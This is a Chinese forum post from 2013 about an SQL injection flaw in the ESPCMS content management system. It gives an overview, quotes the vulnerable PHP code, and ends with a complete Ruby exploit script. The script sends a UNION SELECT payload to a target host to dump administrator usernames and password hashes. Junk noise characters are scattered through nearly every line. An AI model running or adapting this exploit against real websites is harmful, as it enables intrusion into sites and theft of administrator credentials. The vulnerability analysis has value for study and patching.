0×0 漏洞概述0×1 漏洞细节4 R7 F1 x% D9 L/ N M' @1 w5 e: c
0×2 PoC b" ^7 e) z+ u: \+ Y) N" _
; J3 z# S. c; _) s! `6 N" }9 b3 d$ D8 c$ Y
' x" `0 `' O* R# S0 M0 ^/ R4 N0×0 漏洞概述
8 e, p# {, y% a2 r
8 s/ Q- p: j& X$ Q易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。5 j4 a9 B3 g6 ^& g% _: V
其在处理传入的参数时考虑不严谨导致SQL注入发生; G' o* p1 r8 _1 e
8 o- L7 C) k/ Y& ?* L* G0 l2 ]) Q- R. i& y# e- x
0×1 漏洞细节3 z8 K" ?3 |( y3 ~
/ T9 v$ t1 B4 V1 o6 a
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。" Q- `, _/ j$ I7 V3 u3 K
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
! h0 L4 \' M9 y' I' y而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。3 n- ]- p, ~8 s0 [
, S5 X ]7 _; o# u3 G: l# U在/interface/3gwap_search.php文件的in_result函数中:# _& m& m" }, X. V' S5 M, }! B
! i- A2 v) S; d# M3 M+ C
) P+ }, m7 d6 d' |9 M
. v0 g3 Y. h, t7 K+ N9 i3 c2 ^ function in_result() {4 B6 B" R. R4 M
... ... ... ... ... ... ... ... .... D+ v3 W6 y2 `( |) y5 c
$urlcode = $_SERVER[ 'QUERY_STRING '];
) q, n- _# w7 n5 ^# h. z parse_str(html_entity_decode($urlcode), $output);; h# q" P# B j9 @2 J/ D( F1 v% T
3 M0 P2 n5 o! u! ]4 Z. u
... ... ... ... ... ... ... ... ...
* b* B4 D2 ~4 H8 M5 _7 U% e2 b if (is_array($output['attr' ]) && count($output['attr']) > 0) {0 A, B. b4 s' H$ g
4 m7 f4 _/ A. v7 \$ S) F+ N
$db_table = db_prefix . 'model_att';
, m. N; u E5 W) I
" H& ]. m) c+ ^3 d* s8 S; `: I2 \ foreach ($output['attr' ] as $key => $value) {
6 C' c* F& e+ z. N9 u6 G2 u if ($value) {1 H( e8 O+ B+ m( }, y
) @7 k+ t% c1 [& c8 N/ O4 n
$key = addslashes($key);
- S% J$ Y* {! ~/ Z+ A $key = $this-> fun->inputcodetrim($key);, d# s$ D) f# t' O! }
$db_att_where = " WHERE isclass=1 AND attrname='$key'";# S% X# P* z$ E2 E
$countnum = $this->db_numrows($db_table, $db_att_where);+ @& R# k) F8 }' j4 D0 l& B
if ($countnum > 0) {
: p% }& y5 R& [ $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;$ R" r5 ~7 I4 `2 h; y0 \5 y
}
! o j/ W3 ^, x }7 B% M8 m0 |0 o# \
}3 |3 f5 V# T. B1 ^/ I6 z _ t+ z
}
* Z' j2 o' n# \2 }/ J; d if (!empty ($keyword) && empty($keyname)) {; ~! n9 f/ \. ~: Z
$keyname = 'title';
- o4 @; s# m% s3 h0 ^ $db_where.= " AND a.title like '%$keyword%'" ;
3 F* @/ F+ V+ C) @* k0 H } elseif (!empty ($keyword) && !empty($keyname)) {
9 D. I) E! P2 |; u& r# `3 p $db_where.= " AND $keyname like '% $keyword%'";7 f6 m$ N/ }" l+ p
}
. f/ p( A7 n a6 B, Z' X $pagemax = 15;) H8 X0 @4 I) B4 }- v
. j4 N* l+ w& x$ d+ V $pagesylte = 1;
5 C( a4 a2 {: h$ P# g2 d1 U1 t% ~
. D0 R0 L* H ?* i3 m, ? if ($countnum > 0) {
. v) n9 t! l0 }$ y, ~- K
?+ z8 r- j4 V! M J; l" Q $numpage = ceil($countnum / $pagemax);
( O& x- _9 P- F& K4 b, h5 N } else {2 y3 v# q3 f+ p( M) Y- U6 O: p
$numpage = 1;& Q: @8 T2 d3 a
}
3 a4 p K9 q: N $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;+ I! z* b0 {' {8 g( m& n3 J
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
8 E' Z+ O* {5 v) k E; F5 U- e$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
, [3 _, I9 c6 I8 w; e ... ... ... ... ... ... ... ... ...
! J7 [3 z% b5 o+ D! p f }
3 Q: M m$ X2 V; j
2 ~! _' E: r2 }" v: P. N3 x# f8 Y8 m- `5 P% p8 P& G& N/ s7 F
0×2 PoC# Z( b; U7 O8 T
. |3 ^& n/ \/ t W( W/ |; q& d$ p" ?
! c1 U0 F5 d. E% t! l; |3 s9 c; {% V
2 m. Y8 p8 A0 @& z* q
require "net/http"* Z0 O$ D% \5 h q1 s
- q1 k! K) q- d! l6 m# Y- M7 |def request(method, url)6 K7 J1 Z* r& v3 q! E5 D- l! y
if method.eql?("get")
0 B( Q. K1 t0 d1 |7 c. U4 c' S Z uri = URI.parse(url)1 j8 U" h2 Z4 A! M+ e7 m
http = Net::HTTP.new(uri.host, uri.port)- F5 H/ d: V6 J1 O
response = http.request(Net::HTTP::Get.new(uri.request_uri))3 V5 ^- I+ ^/ y! M
return response' H1 f' ~, d( i$ ?% \; u' Z0 s5 b
end
2 G- C3 B0 i6 }( ]9 E3 f" eend1 g' b+ V- L- \* M
) R4 g1 j* Z6 e! G7 |: qdoc =<<HERE# L$ O6 ?( C O
-------------------------------------------------------6 ^, K8 V4 U- ^
Espcms Injection Exploit Q& H# y% ^) q: F ^0 F& g
Author:ztz
- f8 H0 G5 V( o3 nBlog:http://ztz.fuzzexp.org/( [# j7 `% l# E2 y
-------------------------------------------------------: f# S0 y e/ s9 ^: \& A
$ |0 q0 Y; f. q4 t: SHERE; r2 F' p9 K' n; N( r0 ?
6 l8 R6 J* f& z
usage =<<HERE6 Z, @* o4 e: Q. Z7 P) L" z
Usage: ruby #{$0} host port path' x$ E6 d0 a. i* Z4 T& r
example: ruby #{$0} www.target.com 80 // {& W+ ?6 \' V! K4 G. s
HERE9 }- ^8 ]) k& K8 s3 Y; ?
8 M7 f+ K! i1 d0 F L M
puts doc0 o+ e) R- W# B& i
if ARGV.length < 34 |6 t; b8 B3 {" w! ^
puts usage
3 B; J* b) o3 [7 Xelse
; a& D: h$ p* l4 w9 Q $host = ARGV[0]
1 i, l$ ]: n3 F $port = ARGV[1]8 ]# I9 i- i/ d2 @
$path = ARGV[2]
' A+ `$ c* ]' V# }3 X" O* [+ L9 K- E, D ]
puts "send request..."
. n$ c& t" e3 N2 U9 A9 b url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&. d$ q+ e2 ]4 J6 |% f; \7 X
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
5 m; c7 ^8 b: W,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27* l: ~6 w4 o" g R7 p9 V
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"3 ^5 l# {0 ^4 G5 n8 D% w8 t# N
response = request("get", url)
; S: t" T2 T3 j result = response.body.scan(/\w+&\w{32}/)
4 D1 V/ d5 A2 y8 D4 F' N5 F& h puts result
& v3 U' `4 X0 l7 Y7 T a( oend- J; V: _6 c7 p; t1 u, F; E# x8 o
/ \0 T' ~$ [6 ^; f/ |
|
发表于 2013-7-27 18:31:52
收藏
支持
反对